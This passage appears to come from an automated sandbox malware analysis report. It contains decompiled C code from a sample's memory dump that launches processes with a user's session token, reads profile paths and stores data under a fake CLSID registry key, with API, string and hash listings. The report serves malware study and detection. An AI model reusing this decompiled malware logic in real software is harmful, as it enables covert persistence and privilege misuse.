                                                                                              				short _t50;
                                                                                              				int _t54;
                                                                                              				signed int _t81;
                                                                                              				signed int _t82;
                                                                                              				signed int _t83;
                                                                                              				signed int _t88;
                                                                                              				short* _t89;
                                                                                              				signed int _t90;
                                                                                              				signed int _t91;
                                                                                              				signed short* _t94;
                                                                                              				signed short* _t95;
                                                                                              				signed short* _t96;
                                                                                              				short* _t98;
                                                                                              				void* _t100;
                                                                                              				void* _t102;
                                                                                              				intOrPtr* _t104;
                                                                                              				void* _t105;
                                                                                              				intOrPtr* _t107;
                                                                                              				void* _t108;
                                                                                              				signed int _t109;
                                                                                              				void* _t110;
                                                                                              				void* _t111;
                                                                                              				void* _t113;
                                                                                              				void* _t114;
                                                                                              
                                                                                              				_t89 = __ecx;
                                                                                              				_t45 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t45 ^ _t109;
                                                                                              				_t47 =  *0x429e690; // 0x2a
                                                                                              				_t107 = _a4;
                                                                                              				_t104 = _a8;
                                                                                              				 *((intOrPtr*)(__edx)) = _t47;
                                                                                              				_t48 =  *0x429e690; // 0x2a
                                                                                              				_v556 = __edx;
                                                                                              				_t98 =  &(__ecx[1]);
                                                                                              				 *_t104 = _t48;
                                                                                              				_t49 =  *0x429e690; // 0x2a
                                                                                              				_v540 = __ecx;
                                                                                              				_v560 = _t104;
                                                                                              				 *_t107 = _t49;
                                                                                              				do {
                                                                                              					_t50 =  *_t89;
                                                                                              					_t89 =  &(_t89[1]);
                                                                                              				} while (_t50 != 0);
                                                                                              				_t90 = _t89 - _t98;
                                                                                              				_t91 = _t90 >> 1;
                                                                                              				if(_t90 != 0) {
                                                                                              					_t54 = GetFileVersionInfoSizeW(_v540,  &_v552);
                                                                                              					_v548 = _t54;
                                                                                              					_t118 = _t54;
                                                                                              					if(_t54 != 0) {
                                                                                              						_push(_t54);
                                                                                              						_t105 = E04275B55(_t91, _t107, _t118);
                                                                                              						_t111 = _t110 + 4;
                                                                                              						if(_t105 != 0) {
                                                                                              							if(GetFileVersionInfoW(_v540, _v552, _v548, _t105) != 0 && VerQueryValueW(_t105, L"\\VarFileInfo\\Translation",  &_v544,  &_v536) != 0) {
                                                                                              								_t88 = ( *_v544 & 0x0000ffff) << 0x00000010 |  *(_v544 + 2) & 0x0000ffff;
                                                                                              								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\FileDescription", _t88);
                                                                                              								_t113 = _t111 + 0xc;
                                                                                              								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                                                              									_t96 = _v532;
                                                                                              									_t102 = _v556 - _t96;
                                                                                              									do {
                                                                                              										_t83 =  *_t96 & 0x0000ffff;
                                                                                              										_t96 =  &(_t96[1]);
                                                                                              										 *(_t102 + _t96 - 2) = _t83;
                                                                                              									} while (_t83 != 0);
                                                                                              								}
                                                                                              								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\CompanyName", _t88);
                                                                                              								_t114 = _t113 + 0xc;
                                                                                              								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                                                              									_t95 = _v532;
                                                                                              									_t100 = _v560 - _t95;
                                                                                              									asm("o16 nop [eax+eax]");
                                                                                              									do {
                                                                                              										_t82 =  *_t95 & 0x0000ffff;
                                                                                              										_t95 =  &(_t95[1]);
                                                                                              										 *(_t100 + _t95 - 2) = _t82;
                                                                                              									} while (_t82 != 0);
                                                                                              								}
                                                                                              								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\ProductVersion", _t88);
                                                                                              								_t111 = _t114 + 0xc;
                                                                                              								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                                                              									_t94 = _v532;
                                                                                              									_t108 = _t107 - _t94;
                                                                                              									do {
                                                                                              										_t81 =  *_t94 & 0x0000ffff;
                                                                                              										_t94 =  &(_t94[1]);
                                                                                              										 *(_t108 + _t94 - 2) = _t81;
                                                                                              									} while (_t81 != 0);
                                                                                              								}
                                                                                              							}
                                                                                              							E04275B0F(_t105);
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t109);
                                                                                              			}









































                                                                                              0x04265dd0
                                                                                              0x04265dd9
                                                                                              0x04265de0
                                                                                              0x04265de3
                                                                                              0x04265dea
                                                                                              0x04265df0
                                                                                              0x04265df3
                                                                                              0x04265df5
                                                                                              0x04265dfa
                                                                                              0x04265e00
                                                                                              0x04265e03
                                                                                              0x04265e05
                                                                                              0x04265e0a
                                                                                              0x04265e10
                                                                                              0x04265e16
                                                                                              0x04265e20
                                                                                              0x04265e20
                                                                                              0x04265e23
                                                                                              0x04265e26
                                                                                              0x04265e2b
                                                                                              0x04265e2d
                                                                                              0x04265e2f
                                                                                              0x04265e42
                                                                                              0x04265e48
                                                                                              0x04265e4e
                                                                                              0x04265e50
                                                                                              0x04265e56
                                                                                              0x04265e5c
                                                                                              0x04265e5e
                                                                                              0x04265e63
                                                                                              0x04265e84
                                                                                              0x04265ebc
                                                                                              0x04265ecb
                                                                                              0x04265ed1
                                                                                              0x04265ef2
                                                                                              0x04265efa
                                                                                              0x04265f00
                                                                                              0x04265f02
                                                                                              0x04265f02
                                                                                              0x04265f05
                                                                                              0x04265f08
                                                                                              0x04265f0d
                                                                                              0x04265f02
                                                                                              0x04265f1f
                                                                                              0x04265f25
                                                                                              0x04265f46
                                                                                              0x04265f4e
                                                                                              0x04265f54
                                                                                              0x04265f56
                                                                                              0x04265f60
                                                                                              0x04265f60
                                                                                              0x04265f63
                                                                                              0x04265f66
                                                                                              0x04265f6b
                                                                                              0x04265f60
                                                                                              0x04265f7d
                                                                                              0x04265f83
                                                                                              0x04265fa4
                                                                                              0x04265fa6
                                                                                              0x04265fac
                                                                                              0x04265fb0
                                                                                              0x04265fb0
                                                                                              0x04265fb3
                                                                                              0x04265fb6
                                                                                              0x04265fbb
                                                                                              0x04265fb0
                                                                                              0x04265fc0
                                                                                              0x04265fc3
                                                                                              0x04265fc8
                                                                                              0x04265e63
                                                                                              0x04265e50
                                                                                              0x04265fdd

                                                                                              APIs
                                                                                              Strings
                                                                                              • \StringFileInfo\%08lx\ProductVersion, xrefs: 04265F77
                                                                                              • \VarFileInfo\Translation, xrefs: 04265E98
                                                                                              • \StringFileInfo\%08lx\FileDescription, xrefs: 04265EC5
                                                                                              • \StringFileInfo\%08lx\CompanyName, xrefs: 04265F19
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wsprintf
                                                                                              • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                                                              • API String ID: 2111968516-2104189134
                                                                                              • Opcode ID: 423706837ad5b9fc316a713539a43c084f8c5dcd58c344f4a2fcb8b1ff73d0a6
                                                                                              • Instruction ID: 66fa1551c91a0612488ff17274c7ef801c962f6d83f38c82b2c3980adf0bc115
                                                                                              • Opcode Fuzzy Hash: 423706837ad5b9fc316a713539a43c084f8c5dcd58c344f4a2fcb8b1ff73d0a6
                                                                                              • Instruction Fuzzy Hash: CF516375600219ABCB20DF98EC88EEAB7B8FF15304F5545EAE809D7140EB75AE85CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 53%
                                                                                              			E042672E0(void* __ebx, intOrPtr __edx, void* __eflags, WCHAR* _a8, struct _PROCESS_INFORMATION* _a20) {
                                                                                              				void* _v8;
                                                                                              				void* _v12;
                                                                                              				struct _STARTUPINFOW _v80;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				struct HINSTANCE__* _t26;
                                                                                              				_Unknown_base(*)()* _t27;
                                                                                              				void* _t29;
                                                                                              				void* _t34;
                                                                                              				long _t36;
                                                                                              				intOrPtr _t37;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_t36 = 0;
                                                                                              				_t37 = __edx;
                                                                                              				E0427DEA0(0,  &(_v80.lpReserved), 0, 0x40);
                                                                                              				_v80.cb = 0x44;
                                                                                              				_v80.lpDesktop = _t37;
                                                                                              				_v8 = 0;
                                                                                              				if(E0426ABF0() != 2) {
                                                                                              					return CreateProcessW(0, _a8, 0, 0, 0, 0, 0, 0,  &_v80, _a20);
                                                                                              				} else {
                                                                                              					_t38 = E042670E0(__ebx, 0, _t37);
                                                                                              					if(_t38 != 0) {
                                                                                              						_v12 = 0;
                                                                                              						_t26 = LoadLibraryA("Wtsapi32.dll");
                                                                                              						if(_t26 != 0) {
                                                                                              							_t27 = GetProcAddress(_t26, "WTSQueryUserToken");
                                                                                              							if(_t27 != 0) {
                                                                                              								_push( &_v12);
                                                                                              								_push(_t38);
                                                                                              								if( *_t27() != 0) {
                                                                                              									_t29 =  &_v8;
                                                                                              									__imp__CreateEnvironmentBlock(_t29, _v12, 0);
                                                                                              									if(_t29 != 0) {
                                                                                              										_t29 = _v8;
                                                                                              										_t36 = 0x400;
                                                                                              									} else {
                                                                                              										_v8 = _t29;
                                                                                              									}
                                                                                              									CreateProcessAsUserW(_v12, 0, _a8, 0, 0, 0, _t36, _t29, 0,  &_v80, _a20);
                                                                                              									_t34 = _v8;
                                                                                              									if(_t34 != 0) {
                                                                                              										__imp__DestroyEnvironmentBlock(_t34);
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}















                                                                                              0x042672ea
                                                                                              0x042672f1
                                                                                              0x042672f3
                                                                                              0x042672fb
                                                                                              0x04267302
                                                                                              0x04267305
                                                                                              0x04267310
                                                                                              0x042673c5
                                                                                              0x04267316
                                                                                              0x0426731b
                                                                                              0x0426731f
                                                                                              0x04267326
                                                                                              0x04267329
                                                                                              0x04267331
                                                                                              0x04267339
                                                                                              0x04267341
                                                                                              0x04267346
                                                                                              0x04267347
                                                                                              0x0426734c
                                                                                              0x04267352
                                                                                              0x04267356
                                                                                              0x0426735e
                                                                                              0x04267365
                                                                                              0x04267368
                                                                                              0x04267360
                                                                                              0x04267360
                                                                                              0x04267360
                                                                                              0x04267386
                                                                                              0x0426738c
                                                                                              0x04267391
                                                                                              0x04267394
                                                                                              0x04267394
                                                                                              0x04267391
                                                                                              0x0426734c
                                                                                              0x04267341
                                                                                              0x04267331
                                                                                              0x042673a1
                                                                                              0x042673a1

                                                                                              APIs
                                                                                                • Part of subcall function 0426ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0426AC2E
                                                                                                • Part of subcall function 0426ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0426AC41
                                                                                                • Part of subcall function 0426ABF0: FreeSid.ADVAPI32(?), ref: 0426AC4A
                                                                                              • CreateProcessW.KERNEL32(00000000,04256938,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 042673BA
                                                                                                • Part of subcall function 042670E0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0426711D
                                                                                                • Part of subcall function 042670E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04267135
                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04267329
                                                                                              • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267339
                                                                                              • CreateProcessAsUserW.ADVAPI32(?,00000000,04256938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04267386
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateLibraryLoadProcess$AddressAllocateCheckFreeInitializeMembershipProcTokenUserVersion
                                                                                              • String ID: D$WTSQueryUserToken$Wtsapi32.dll
                                                                                              • API String ID: 903725173-1631787044
                                                                                              • Opcode ID: fdbd2d67e61aa9b30d9e292bf09a284a54f54d6e414667ddfa796eb31aa84c10
                                                                                              • Instruction ID: 6ebe391d69a21eec8bb8e721fced740bb86db212251dd16f13240542e5c73b81
                                                                                              • Opcode Fuzzy Hash: fdbd2d67e61aa9b30d9e292bf09a284a54f54d6e414667ddfa796eb31aa84c10
                                                                                              • Instruction Fuzzy Hash: 5321B571F1020ABBDF209FA8AC09FAEBB78EB84709F100165FD05E2140EB70A951CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04266DF0(intOrPtr* __ecx, char __edx) {
                                                                                              				void* _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				void* _t17;
                                                                                              				long _t18;
                                                                                              				char _t25;
                                                                                              				void* _t30;
                                                                                              				char* _t31;
                                                                                              				char* _t35;
                                                                                              				char* _t36;
                                                                                              				intOrPtr* _t40;
                                                                                              
                                                                                              				_t36 = __ecx;
                                                                                              				_v12 = __edx;
                                                                                              				if(__ecx == 0) {
                                                                                              					return _t17;
                                                                                              				}
                                                                                              				_t40 = __ecx;
                                                                                              				_t30 = __ecx + 2;
                                                                                              				asm("o16 nop [eax+eax]");
                                                                                              				do {
                                                                                              					_t18 =  *_t40;
                                                                                              					_t40 = _t40 + 2;
                                                                                              				} while (_t18 != 0);
                                                                                              				if(_t40 - _t30 >> 1 < 1) {
                                                                                              					L11:
                                                                                              					return _t18;
                                                                                              				}
                                                                                              				_v8 = 0;
                                                                                              				if(RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0) != 0) {
                                                                                              					L9:
                                                                                              					_v16 = _v12;
                                                                                              					_v8 = 0;
                                                                                              					_t18 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0);
                                                                                              					if(_t18 == 0) {
                                                                                              						RegSetValueExW(_v8, "2", 0, 4,  &_v16, 4);
                                                                                              						_t18 = RegCloseKey(_v8);
                                                                                              					}
                                                                                              					goto L11;
                                                                                              				}
                                                                                              				_t31 = _t36;
                                                                                              				_t35 =  &(_t31[2]);
                                                                                              				do {
                                                                                              					_t25 =  *_t31;
                                                                                              					_t31 =  &(_t31[2]);
                                                                                              				} while (_t25 != 0);
                                                                                              				RegSetValueExW(_v8, "1", 0, 1, _t36, 2 + (_t31 - _t35 >> 1) * 2);
                                                                                              				RegCloseKey(_v8);
                                                                                              				goto L9;
                                                                                              			}














                                                                                              0x04266df7
                                                                                              0x04266df9
                                                                                              0x04266dfe
                                                                                              0x04266eef
                                                                                              0x04266eef
                                                                                              0x04266e05
                                                                                              0x04266e07
                                                                                              0x04266e0a
                                                                                              0x04266e10
                                                                                              0x04266e10
                                                                                              0x04266e13
                                                                                              0x04266e16
                                                                                              0x04266e22
                                                                                              0x04266eea
                                                                                              0x00000000
                                                                                              0x04266eea
                                                                                              0x04266e4b
                                                                                              0x04266e56
                                                                                              0x04266e9d
                                                                                              0x04266ea2
                                                                                              0x04266ec0
                                                                                              0x04266ec7
                                                                                              0x04266ecb
                                                                                              0x04266edf
                                                                                              0x04266ee8
                                                                                              0x04266ee8
                                                                                              0x00000000
                                                                                              0x04266ecb
                                                                                              0x04266e58
                                                                                              0x04266e5a
                                                                                              0x04266e60
                                                                                              0x04266e60
                                                                                              0x04266e63
                                                                                              0x04266e66
                                                                                              0x04266e84
                                                                                              0x04266e93
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,0426C359,00000000,00000000,00000000), ref: 04266E52
                                                                                              • RegSetValueExW.ADVAPI32(00000000,0429E09C,00000000,00000001,?,00000000), ref: 04266E84
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 04266E93
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04266EC7
                                                                                              • RegSetValueExW.ADVAPI32(00000000,0429E124,00000000,00000004,?,00000004), ref: 04266EDF
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 04266EE8
                                                                                              Strings
                                                                                              • SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}, xrefs: 04266E41, 04266EB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                                                              • API String ID: 1818849710-2030040551
                                                                                              • Opcode ID: d38e4d665d19d9b76d8ac51bf502504b5e268f9aa326f9fb7ab4c47a5c4209f4
                                                                                              • Instruction ID: 352f2061b7dd63a59af6422bbba30b12564c0d46cf82d0a818cef154023383a5
                                                                                              • Opcode Fuzzy Hash: d38e4d665d19d9b76d8ac51bf502504b5e268f9aa326f9fb7ab4c47a5c4209f4
                                                                                              • Instruction Fuzzy Hash: D921A075B40209FBEB24AB94ED06FADB778EB44B00F210159EA05BB1D0D6B17E11CA94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E0425A980(void* __ebx, void* __ecx, void* __eflags, char* _a4, int _a8) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				void* _v612;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int _t23;
                                                                                              				int _t31;
                                                                                              				struct _CRITICAL_SECTION* _t39;
                                                                                              				char* _t45;
                                                                                              				void* _t56;
                                                                                              				int _t58;
                                                                                              				void* _t61;
                                                                                              				void* _t64;
                                                                                              				signed int _t71;
                                                                                              
                                                                                              				_t69 = _t71;
                                                                                              				_t23 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t23 ^ _t71;
                                                                                              				_t45 = _a4;
                                                                                              				_push(_t61);
                                                                                              				_t56 = __ecx;
                                                                                              				E04266050(_t45, L"Global",  &_v88, __ecx, _t61);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_v612 = 0;
                                                                                              				_t31 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                                                              				if(_t31 != 0) {
                                                                                              					L2:
                                                                                              					return E04275AFE(_v8 ^ _t69);
                                                                                              				} else {
                                                                                              					RegSetValueExW(_v612, "1", _t31, 3, _t45, _a8);
                                                                                              					_t64 =  ==  ? 1 : 0;
                                                                                              					RegCloseKey(_v612);
                                                                                              					if(_t64 != 0) {
                                                                                              						CreateEventA(0, 1, 0, _t56 + 0xc);
                                                                                              						E0427F4A8(0);
                                                                                              						asm("int3");
                                                                                              						asm("int3");
                                                                                              						_push(_t56);
                                                                                              						_t58 = 1;
                                                                                              						 *1 = 0x429df78;
                                                                                              						if( *0x00000025 == 0) {
                                                                                              							L10:
                                                                                              							_t39 = _t58 + 0x28;
                                                                                              							DeleteCriticalSection(_t39);
                                                                                              							return _t39;
                                                                                              						} else {
                                                                                              							_push(_t64);
                                                                                              							EnterCriticalSection(0x29);
                                                                                              							if( *0x00000025 != 0) {
                                                                                              								_t52 =  *0x00000041;
                                                                                              								 *0x00000025 = 0;
                                                                                              								if( *0x00000041 != 0) {
                                                                                              									E0426FE10(_t52, 0x29);
                                                                                              									 *0x00000041 = 0;
                                                                                              								}
                                                                                              								LeaveCriticalSection(0x29);
                                                                                              								 *((intOrPtr*)( *_t58 + 4))();
                                                                                              								goto L10;
                                                                                              							} else {
                                                                                              								LeaveCriticalSection(0x29);
                                                                                              								DeleteCriticalSection(0x29);
                                                                                              								return 0x29;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              			}


















                                                                                              0x0425a981
                                                                                              0x0425a989
                                                                                              0x0425a990
                                                                                              0x0425a994
                                                                                              0x0425a99a
                                                                                              0x0425a99c
                                                                                              0x0425a9a3
                                                                                              0x0425a9b8
                                                                                              0x0425a9c9
                                                                                              0x0425a9e6
                                                                                              0x0425a9ee
                                                                                              0x0425aa22
                                                                                              0x0425aa34
                                                                                              0x0425a9f0
                                                                                              0x0425aa02
                                                                                              0x0425aa15
                                                                                              0x0425aa18
                                                                                              0x0425aa20
                                                                                              0x0425aa41
                                                                                              0x0425aa49
                                                                                              0x0425aa4e
                                                                                              0x0425aa4f
                                                                                              0x0425aa50
                                                                                              0x0425aa51
                                                                                              0x0425aa57
                                                                                              0x0425aa5d
                                                                                              0x0425aaad
                                                                                              0x0425aaad
                                                                                              0x0425aab1
                                                                                              0x0425aab8
                                                                                              0x0425aa5f
                                                                                              0x0425aa5f
                                                                                              0x0425aa64
                                                                                              0x0425aa6e
                                                                                              0x0425aa84
                                                                                              0x0425aa87
                                                                                              0x0425aa90
                                                                                              0x0425aa92
                                                                                              0x0425aa97
                                                                                              0x0425aa97
                                                                                              0x0425aa9f
                                                                                              0x0425aaa9
                                                                                              0x00000000
                                                                                              0x0425aa70
                                                                                              0x0425aa71
                                                                                              0x0425aa7c
                                                                                              0x0425aa83
                                                                                              0x0425aa83
                                                                                              0x0425aa6e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425aa20

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0425A9B8
                                                                                              • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0425A9E6
                                                                                              • RegSetValueExW.ADVAPI32(?,0429E09C,00000000,00000003,?,?), ref: 0425AA02
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0425AA18
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0425AA41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                                                              • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                              • API String ID: 2801368686-1865207932
                                                                                              • Opcode ID: 867b9cc6c2ef19373db15eedd6e8d2a340ad75defbc2fb96f9cb5a34d3b32e92
                                                                                              • Instruction ID: 588cd00ddd24a5d7dede8c9becab2210c3ee073221c4f017e7f3f99ae0456b2d
                                                                                              • Opcode Fuzzy Hash: 867b9cc6c2ef19373db15eedd6e8d2a340ad75defbc2fb96f9cb5a34d3b32e92
                                                                                              • Instruction Fuzzy Hash: A1219371B1521CBBDB20DBA5EC49FABBB6CFF44714F004155BA09E6040DA75AE04DBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E04267240(WCHAR* __ecx, long* __edx, void* __eflags) {
                                                                                              				void* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				struct HINSTANCE__* _t11;
                                                                                              				_Unknown_base(*)()* _t12;
                                                                                              				void* _t13;
                                                                                              				WCHAR* _t16;
                                                                                              				intOrPtr* _t21;
                                                                                              				void* _t22;
                                                                                              
                                                                                              				_t21 = __edx;
                                                                                              				_t16 = __ecx;
                                                                                              				_t22 = 0;
                                                                                              				if(E0426ABF0() != 2) {
                                                                                              					 *_t21 = GetEnvironmentVariableW(L"USERPROFILE", _t16,  *__edx);
                                                                                              					_t22 =  !=  ? 1 : 0;
                                                                                              					goto L6;
                                                                                              				} else {
                                                                                              					_v12 = E042670E0(_t16, __edx, 0);
                                                                                              					_v8 = 0;
                                                                                              					_t11 = LoadLibraryA("Wtsapi32.dll");
                                                                                              					if(_t11 == 0) {
                                                                                              						L6:
                                                                                              						return _t22;
                                                                                              					} else {
                                                                                              						_t12 = GetProcAddress(_t11, "WTSQueryUserToken");
                                                                                              						if(_t12 == 0) {
                                                                                              							goto L6;
                                                                                              						} else {
                                                                                              							_t13 =  *_t12(_v12,  &_v8);
                                                                                              							if(_t13 == 0) {
                                                                                              								goto L6;
                                                                                              							} else {
                                                                                              								__imp__GetUserProfileDirectoryW(_v8, _t16, _t21);
                                                                                              								CloseHandle(_v8);
                                                                                              								return _t13;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}














                                                                                              0x04267249
                                                                                              0x0426724b
                                                                                              0x0426724d
                                                                                              0x04267257
                                                                                              0x042672bf
                                                                                              0x042672c6
                                                                                              0x00000000
                                                                                              0x04267259
                                                                                              0x04267263
                                                                                              0x04267266
                                                                                              0x04267269
                                                                                              0x04267271
                                                                                              0x042672ca
                                                                                              0x042672d1
                                                                                              0x04267273
                                                                                              0x04267279
                                                                                              0x04267281
                                                                                              0x00000000
                                                                                              0x04267283
                                                                                              0x0426728a
                                                                                              0x0426728e
                                                                                              0x00000000
                                                                                              0x04267290
                                                                                              0x04267295
                                                                                              0x042672a0
                                                                                              0x042672ae
                                                                                              0x042672ae
                                                                                              0x0426728e
                                                                                              0x04267281
                                                                                              0x04267271

                                                                                              APIs
                                                                                                • Part of subcall function 0426ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0426AC2E
                                                                                                • Part of subcall function 0426ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0426AC41
                                                                                                • Part of subcall function 0426ABF0: FreeSid.ADVAPI32(?), ref: 0426AC4A
                                                                                              • GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000104,?,?,?,042568B1), ref: 042672B7
                                                                                                • Part of subcall function 042670E0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0426711D
                                                                                                • Part of subcall function 042670E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04267135
                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,042568B1), ref: 04267269
                                                                                              • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267279
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,042568B1), ref: 042672A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$AddressAllocateCheckCloseEnvironmentFreeHandleInitializeMembershipProcTokenVariableVersion
                                                                                              • String ID: USERPROFILE$WTSQueryUserToken$Wtsapi32.dll
                                                                                              • API String ID: 4195895698-4029724716
                                                                                              • Opcode ID: e27766d59819a54addfb2db71a31e39984cb8ebee9e8c8fbf52e6fa76be8cb60
                                                                                              • Instruction ID: 27d1f9507295446f0a2a652341c363af9e62b69043c0ebfea0bcf23b2ab83567
                                                                                              • Opcode Fuzzy Hash: e27766d59819a54addfb2db71a31e39984cb8ebee9e8c8fbf52e6fa76be8cb60
                                                                                              • Instruction Fuzzy Hash: D601C43171420ABB9F10AAF9BC0995EFBA8EF94659B200166F805D2100EF219D518B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 61%
                                                                                              			E04265D40(void* __edi, void* __esi) {
                                                                                              				signed int _v8;
